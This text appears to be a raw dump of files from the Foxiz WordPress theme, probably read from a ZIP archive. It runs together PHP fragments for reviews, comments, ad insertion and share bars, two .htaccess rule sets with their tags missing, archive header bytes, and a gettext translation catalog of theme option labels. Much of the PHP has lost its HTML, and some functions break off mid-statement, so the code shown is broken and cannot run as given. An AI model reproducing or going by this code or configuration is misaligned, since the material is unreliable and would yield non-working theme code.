1 ) { $output = sprintf( foxiz_html__( '%s Reviews', 'foxiz' ), $count ); } elseif ( 1 === $count ) { $output = foxiz_html__( '1 Review', 'foxiz' ); } return $output; } } if ( ! function_exists( 'foxiz_get_comment_heading' ) ) { /** * @param string $post_id * * @return mixed|string */ function foxiz_get_comment_heading( $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } $output = foxiz_html__( 'Leave a comment', 'foxiz' ); $count = intval( get_comments_number( $post_id ) ); if ( $count > 1 ) { $output = sprintf( foxiz_html__( '%s Comments', 'foxiz' ), $count ); } elseif ( 1 === $count ) { $output = foxiz_html__( '1 Comment', 'foxiz' ); } return $output; } } if ( ! function_exists( 'foxiz_single_newsletter' ) ) { /** * @return false */ function foxiz_single_newsletter() { if ( ! foxiz_get_option( 'single_post_newsletter' ) || ! do_shortcode( '[ruby_static_newsletter]' ) ) { return false; } ?>
comment_ID, 'rbrating', true ); ?>
  • says:', sprintf( '%s', get_comment_author_link( $comment ) ) ); ?>
    comment_approved ) : ?>
    'div-comment', 'depth' => $depth, 'max_depth' => $args['max_depth'], 'before' => '', 'after' => '', ) ) ); ?>
  • foxiz_get_option( 'amp_top_single_ad_type' ), 'client' => foxiz_get_option( 'amp_top_single_adsense_client' ), 'slot' => foxiz_get_option( 'amp_top_single_adsense_slot' ), 'size' => foxiz_get_option( 'amp_top_single_adsense_size' ), 'custom' => foxiz_get_option( 'amp_top_single_ad_code' ), 'classname' => 'top-single-amp-ad amp-ad-wrap' ) ); } return false; } $setting = rb_get_meta( 'entry_top', get_the_ID() ); if ( ( empty( $setting ) || '-1' !== (string) $setting ) && is_active_sidebar( 'foxiz_entry_top' ) ) : ?>
    foxiz_get_option( 'amp_bottom_single_ad_type' ), 'client' => foxiz_get_option( 'amp_bottom_single_adsense_client' ), 'slot' => foxiz_get_option( 'amp_bottom_single_adsense_slot' ), 'size' => foxiz_get_option( 'amp_bottom_single_adsense_size' ), 'custom' => foxiz_get_option( 'amp_bottom_single_ad_code' ), 'classname' => 'bottom-single-amp-ad amp-ad-wrap' ) ); } return false; } $setting = rb_get_meta( 'entry_bottom', get_the_ID() ); if ( ( empty( $setting ) || '-1' !== (string) $setting ) && is_active_sidebar( 'foxiz_entry_bottom' ) ) : ?>
    ' . wp_get_attachment_image( $settings['image'] ) . '
    '; } else if ( ! empty( $settings['image']['url'] ) ) : ?>
    <?php echo esc_attr( $settings['image']['url'] ); ?>
    foxiz_get_option( 'share_sticky_facebook' ), 'twitter' => foxiz_get_option( 'share_sticky_twitter' ), 'pinterest' => foxiz_get_option( 'share_sticky_pinterest' ), 'whatsapp' => foxiz_get_option( 'share_sticky_whatsapp' ), 'linkedin' => foxiz_get_option( 'share_sticky_linkedin' ), 'tumblr' => foxiz_get_option( 'share_sticky_tumblr' ), 'reddit' => foxiz_get_option( 'share_sticky_reddit' ), 'vk' => foxiz_get_option( 'share_sticky_vk' ), 'telegram' => foxiz_get_option( 'share_sticky_telegram' ), 'email' => foxiz_get_option( 'share_sticky_email' ), 'print' => foxiz_get_option( 'share_sticky_print' ), 'tipsy_gravity' => 'n' ); if ( ! array_filter( $settings ) ) { return false; } $settings['post_id'] = $post_id; $class_name = 'sticky-share-list-items effect-fadeout'; if ( foxiz_get_option( 'share_sticky_color' ) ) { $class_name .= ' is-color'; } ob_start(); ?>
    '; $output .= '
    ' . foxiz_html__( 'Section', 'foxiz' ) . '
    '; $output .= '
    '; $output .= '
    '; if ( ! empty( $headings[ $prev ]['title'] ) ) { $output .= '' . esc_html( $page . ' - ' . $headings[ $prev ]['title'] ) . ''; } $output .= '
    '; $output .= '
    '; $output .= '
    '; for ( $i = 1; $i <= $numpages; $i ++ ) { $link = ''; $index = $i - 1; if ( ! empty( $headings[ $index ]['title'] ) ) { $link = $i . ' - ' . esc_html( $headings[ $index ]['title'] ); } if ( $i !== $page || ! $more && 1 === $page ) { $link = '
    ' . _wp_link_page( $i ) . $link . '
    '; } elseif ( $i === $page ) { $link = '
    ' . $link . '
    '; } $output .= $link; } $output .= '
    '; $output .= '
    '; $output .= '
    '; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_single_inline_ad' ) ) { /** * @return false|void */ function foxiz_get_single_inline_ad() { if ( ! foxiz_get_option( 'ad_single_code' ) && ! foxiz_get_option( 'ad_single_image' ) ) { return false; } $classes = 'inline-single-ad align' . foxiz_get_option( 'ad_single_align' ); if ( foxiz_get_option( 'ad_single_type' ) ) { $settings = array( 'code' => foxiz_get_option( 'ad_single_code' ), 'description' => foxiz_get_option( 'ad_single_description' ), 'size' => foxiz_get_option( 'ad_single_size' ), 'desktop_size' => foxiz_get_option( 'ad_single_desktop_size' ), 'tablet_size' => foxiz_get_option( 'ad_single_tablet_size' ), 'mobile_size' => foxiz_get_option( 'ad_single_mobile_size' ), 'no_spacing' => 1 ); if ( foxiz_get_adsense( $settings ) ) { return '
    ' . foxiz_get_adsense( $settings ) . '
    '; } } else { $settings = array( 'description' => foxiz_get_option( 'ad_single_description' ), 'image' => foxiz_get_option( 'ad_single_image' ), 'dark_image' => foxiz_get_option( 'ad_single_dark_image' ), 'destination' => foxiz_get_option( 'ad_single_destination' ), 'no_spacing' => 1 ); if ( foxiz_get_ad_image( $settings ) ) { return '
    ' . foxiz_get_ad_image( $settings ) . '
    '; } } } } add_filter( 'the_content', 'foxiz_add_single_inline_ad', 100 ); if ( ! function_exists( 'foxiz_add_single_inline_ad' ) ) { function foxiz_add_single_inline_ad( $content ) { if ( ! is_singular( 'post' ) ) { return $content; } $tag = '

    '; /** amp inline ad */ if ( foxiz_is_amp() ) { $amp_buffer = foxiz_get_single_inline_amp_ad(); if ( empty( $amp_buffer ) ) { return $content; } $amp_positions = foxiz_get_option( 'amp_ad_single_positions' ); if ( empty( $amp_positions ) ) { $amp_positions = '4'; }; $amp_positions = explode( ',', $amp_positions ); $content = explode( $tag, $content ); foreach ( $content as $index => $paragraph ) { if ( in_array( $index, $amp_positions ) ) { $content[ $index ] = $amp_buffer . $paragraph; } if ( trim( $paragraph ) ) { $content[ $index ] .= $tag; } } return implode( '', $content ); } $buffer = foxiz_get_single_inline_ad(); if ( empty( $buffer ) ) { return $content; } $positions = foxiz_get_option( 'ad_single_positions' ); if ( empty( $positions ) ) { $positions = '4'; }; $positions = explode( ',', $positions ); $content = explode( $tag, $content ); foreach ( $content as $index => $paragraph ) { if ( in_array( $index, $positions ) ) { $content[ $index ] = $buffer . $paragraph; } if ( trim( $paragraph ) ) { $content[ $index ] .= $tag; } } return implode( '', $content ); } } if ( ! function_exists( 'foxiz_get_single_inline_amp_ad' ) ) { /** * @return false|string */ function foxiz_get_single_inline_amp_ad() { if ( ! function_exists( 'foxiz_amp_ad' ) ) { return false; } ob_start(); foxiz_amp_ad( array( 'type' => foxiz_get_option( 'amp_inline_single_ad_type' ), 'client' => foxiz_get_option( 'amp_inline_single_adsense_client' ), 'slot' => foxiz_get_option( 'amp_inline_single_adsense_slot' ), 'size' => foxiz_get_option( 'amp_inline_single_adsense_size' ), 'custom' => foxiz_get_option( 'amp_inline_single_ad_code' ), 'classname' => 'inline-single-amp-ad amp-ad-wrap' ) ); return ob_get_clean(); } } PK!#,h[templates/single/video-3.phpnu[
    >
    'featured-img' ) ); ?>
    10 ) { $element['rating'] = 10; } elseif ( $element['rating'] < 1 ) { $element['rating'] = 1; } ?>
    5 ) { $element['rating'] = 5; } elseif ( $element['rating'] < 1 ) { $element['rating'] = 1; } ?>
    <?php echo esc_attr( $settings['image']['url'] ); ?>
    'featured-img' ) ); ?>
    Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!.|templates/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!Ϛ single.phpnu[
      100, 'style' => 'ul', 'short_ping' => true, ) ); ?>
    '' . foxiz_html__( '← Older Comments', 'foxiz' ) . '', 'next_text' => '' . foxiz_html__( 'Newer Comments →', 'foxiz' ) . '', ) ); ?>

    (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/configs.php:330 backend/configs.php:874 msgid "Border" msgstr "" #: backend/configs.php:331 msgid "Border (Big)" msgstr "" #: backend/panels/header-style.php:621 msgid "Border Top & Bottom Shadow" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/blog-pages.php:658 msgid "Bottom Area Template Shortcode" msgstr "" #: backend/configs.php:334 backend/panels/blog-pages.php:51 #: backend/panels/blog-pages.php:617 backend/panels/blog-pages.php:1935 #: backend/panels/header-style.php:72 backend/panels/header-style.php:617 #: backend/single-metaboxes.php:134 backend/single-metaboxes.php:911 msgid "Bottom Border" msgstr "" #: backend/configs.php:335 msgid "Bottom Border (Big)" msgstr "" #: backend/panels/single-post.php:845 msgid "Bottom Content Share Bar" msgstr "" #: backend/configs.php:332 msgid "Bottom Dotted" msgstr "" #: backend/configs.php:333 msgid "Bottom Dotted (Big)" msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/configs.php:374 msgid "Bottom Right" msgstr "" #: backend/configs.php:375 msgid "Bottom Right (Big Icon)" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/block-grid.php:672 backend/panels/block-grid.php:859 #: backend/panels/block-list.php:524 backend/panels/block-list.php:719 msgid "Box Color" msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/block-grid.php:526 backend/panels/block-grid.php:713 #: backend/panels/block-list.php:377 backend/panels/block-list.php:572 msgid "Box Style" msgstr "" #: backend/panels/block-grid.php:522 backend/panels/block-grid.php:709 #: backend/panels/block-list.php:373 backend/panels/block-list.php:568 msgid "boxed grid" msgstr "" #: backend/category-settings.php:246 backend/configs.php:459 #: backend/panels/block-grid.php:512 msgid "Boxed Grid 1" msgstr "" #: backend/category-settings.php:247 backend/configs.php:463 #: backend/panels/block-grid.php:699 msgid "Boxed Grid 2" msgstr "" #: backend/category-settings.php:251 backend/configs.php:479 #: backend/panels/block-list.php:363 msgid "Boxed List 1" msgstr "" #: backend/category-settings.php:252 backend/configs.php:483 #: backend/panels/block-list.php:558 msgid "Boxed List 2" msgstr "" #: backend/category-settings.php:100 backend/panels/typography.php:845 msgid "Breadcrumb" msgstr "" #: backend/panels/breadcrumb.php:14 backend/panels/breadcrumb.php:30 msgid "Breadcrumb Bar" msgstr "" #: backend/panels/color.php:140 msgid "Breadcrumb Color" msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your " "website. This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/single-post.php:488 msgid "" "By default, Primary category setting will only apply to the post listing." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/design.php:453 msgid "Carousel Free Scroll" msgstr "" #: backend/panels/blog-pages.php:17 msgid "Category" msgstr "" #: backend/configs.php:404 backend/panels/design.php:270 msgid "category (Categories)" msgstr "" #: backend/panels/breadcrumb.php:72 msgid "Category Breadcrumb" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: backend/category-settings.php:73 backend/category-settings.php:78 #: backend/panels/blog-pages.php:77 backend/panels/blog-pages.php:82 msgid "Category Header" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/panels/design.php:145 msgid "Category Meta Icon" msgstr "" #: backend/configs.php:379 backend/panels/login.php:41 msgid "Center" msgstr "" #: backend/configs.php:380 msgid "Center (Big Icon)" msgstr "" #: backend/panels/header.php:344 msgid "Center Logo" msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/block-classic.php:163 backend/panels/block-grid.php:163 #: backend/panels/block-grid.php:328 backend/panels/block-grid.php:493 #: backend/panels/block-grid.php:666 backend/panels/block-grid.php:853 #: backend/panels/block-list.php:171 backend/panels/block-list.php:344 #: backend/panels/block-list.php:539 backend/panels/block-list.php:734 msgid "Centering Content" msgstr "" #: backend/panels/block-classic.php:164 backend/panels/block-grid.php:164 #: backend/panels/block-grid.php:329 backend/panels/block-grid.php:494 #: backend/panels/block-grid.php:667 backend/panels/block-grid.php:854 #: backend/panels/block-list.php:172 backend/panels/block-list.php:345 #: backend/panels/block-list.php:540 backend/panels/block-list.php:735 msgid "Centering text and elements for the post listing." msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/category-settings.php:243 backend/configs.php:447 #: backend/panels/block-classic.php:17 msgid "Classic (Standard)" msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without " "special charsets and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/header.php:367 msgid "Collapse Section" msgstr "" #: backend/panels/header.php:440 backend/panels/header.php:493 msgid "Collapse Section - Text Color" msgstr "" #: backend/panels/header.php:429 backend/panels/header.php:482 msgid "Collapse Section Background" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/panels/header.php:321 msgid "" "Color settings will apply to the tablet and mobile header. Leave blank to " "set as the desktop navigation colors." msgstr "" #: backend/panels/single-post.php:714 backend/panels/single-post.php:853 #: backend/panels/single-post.php:991 backend/panels/single-post.php:1612 msgid "Colorful Icons" msgstr "" #: backend/panels/footer.php:106 msgid "Column Border" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/category-settings.php:282 backend/panels/blog-pages.php:282 #: backend/panels/blog-pages.php:769 backend/panels/blog-pages.php:1183 #: backend/panels/blog-pages.php:1591 backend/panels/blog-pages.php:2083 #: backend/panels/bookmark.php:186 backend/panels/bookmark.php:626 #: backend/panels/bookmark.php:634 msgid "Columns Gap" msgstr "" #: backend/category-settings.php:258 backend/panels/blog-pages.php:258 #: backend/panels/blog-pages.php:745 backend/panels/blog-pages.php:1567 #: backend/panels/blog-pages.php:2059 backend/panels/bookmark.php:162 msgid "Columns on Desktop" msgstr "" #: backend/category-settings.php:274 backend/panels/blog-pages.php:274 #: backend/panels/blog-pages.php:761 backend/panels/blog-pages.php:1175 #: backend/panels/blog-pages.php:1583 backend/panels/blog-pages.php:2075 #: backend/panels/bookmark.php:178 backend/panels/bookmark.php:618 msgid "Columns on Mobile" msgstr "" #: backend/category-settings.php:266 backend/panels/blog-pages.php:266 #: backend/panels/blog-pages.php:753 backend/panels/blog-pages.php:1167 #: backend/panels/blog-pages.php:1575 backend/panels/blog-pages.php:2067 #: backend/panels/bookmark.php:170 backend/panels/bookmark.php:610 msgid "Columns on Tablet" msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/configs.php:407 backend/panels/design.php:273 msgid "comment (Comments)" msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/design.php:124 msgid "Comment Meta Icon" msgstr "" #: backend/panels/single-post.php:1203 msgid "Comments" msgstr "Comentários" #: comments.php:32 msgid "Comments are closed." msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/table-contents.php:134 msgid "Contents" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: backend/panels/single-post.php:813 backend/panels/single-post.php:952 #: backend/panels/single-post.php:1090 msgid "Copy Link" msgstr "" #: backend/panels/footer.php:207 msgid "Copyright - Font Size" msgstr "" #: backend/panels/footer.php:199 msgid "Copyright Menu" msgstr "" #: backend/panels/footer.php:213 msgid "Copyright Menu - Font Size" msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 #: backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/footer.php:191 msgid "Copyright Text" msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/design.php:331 msgid 